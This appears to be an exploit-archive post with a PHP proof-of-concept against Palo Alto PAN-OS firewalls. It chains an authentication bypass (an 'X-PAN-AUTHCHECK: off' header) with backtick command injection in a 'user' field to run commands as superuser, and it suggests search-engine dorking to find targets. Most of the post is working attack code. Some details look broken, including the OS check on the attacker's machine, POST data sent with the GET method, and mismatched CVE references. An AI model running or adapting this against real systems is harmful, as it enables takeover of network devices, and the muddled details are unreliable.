=============================================================================================================================================
| # Title     : Palo Alto Networks PAN-OS 11.2 PHP Code Injection Vulnerability                                                             |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://paloaltonetworks.com                                                                                                |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Bypasses authentication using CVE-2024-0012.

    Exploits command execution vulnerability CVE-2024-9474.

    Uses an administrator session to run any commands on the system.

    Supports execution of any command on the system, such as loading a shell.
	
	( https://packetstorm.news/files/id/182665/ -	CVE-2024-24809, CVE-2024-5910 )
 
[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] SeT target  = Line : 77

[+] PayLoad :

<?php

function sendRequest($url, $data = null, $headers = [], $method = 'GET', $cookies = []) {
    $ch = curl_init();
    
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

    if (!empty($headers)) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    }

    if (!empty($cookies)) {
        curl_setopt($ch, CURLOPT_COOKIE, implode("; ", $cookies));
    }

    if ($method == 'POST') {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }

    $response = curl_exec($ch);
    curl_close($ch);

    return $response;
}

// 📌 تجاوز المصادقة والحصول على جلسة مسؤول
function bypassAuth($target) {
    $auth_url = "$target/php/utils/createRemoteAppwebSession.php?" . bin2hex(random_bytes(4)) . ".js.map";
    
    $postData = [
        'user' => '`whoami`', // يمكن تغييره إلى `cmd.exe /c whoami` في ويندوز
        'userRole' => 'superuser',
        'remoteHost' => '',
        'vsys' => 'vsys1'
    ];

    $headers = [
        "X-PAN-AUTHCHECK: off"
    ];

    $response = sendRequest($auth_url, http_build_query($postData), $headers, 'POST');

    if (strpos($response, "PHPSESSID") !== false) {
        preg_match('/PHPSESSID=([^;]+)/', $response, $matches);
        return $matches[1] ?? null;
    }

    return null;
}

// 📌 استغلال تنفيذ الأوامر عبر الجلسة المصادق عليها
function executeCommand($target, $session, $cmd) {
    $exploit_url = "$target/index.php/.js.map";

    $cookies = ["PHPSESSID=$session"];

    // تعديل الأوامر بناءً على النظام
    if (stripos(PHP_OS, 'WIN') !== false) {
        $cmd = "cmd.exe /c " . $cmd; // إذا كان ويندوز، استعمل cmd.exe
    }

    $postData = [
        'user' => "`$cmd`",
        'userRole' => 'superuser',
        'remoteHost' => '',
        'vsys' => 'vsys1'
    ];

    sendRequest($exploit_url, $postData, [], 'GET', $cookies);
}

// 📌 تشغيل الاستغلال
$target = "http://127.0.0.1"; // 🔥 عدل الهدف هنا

echo "[+] تجاوز المصادقة...\n";
$session = bypassAuth($target);

if ($session) {
    echo "[+] تم الحصول على الجلسة: $session\n";

    if (stripos(PHP_OS, 'WIN') !== false) {
        echo "[+] تشغيل أمر Windows: whoami\n";
        executeCommand($target, $session, "whoami");
    } else {
        echo "[+] تشغيل أمر Linux: whoami\n";
        executeCommand($target, $session, "whoami");
    }

} else {
    echo "[-] فشل تجاوز المصادقة!\n";
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================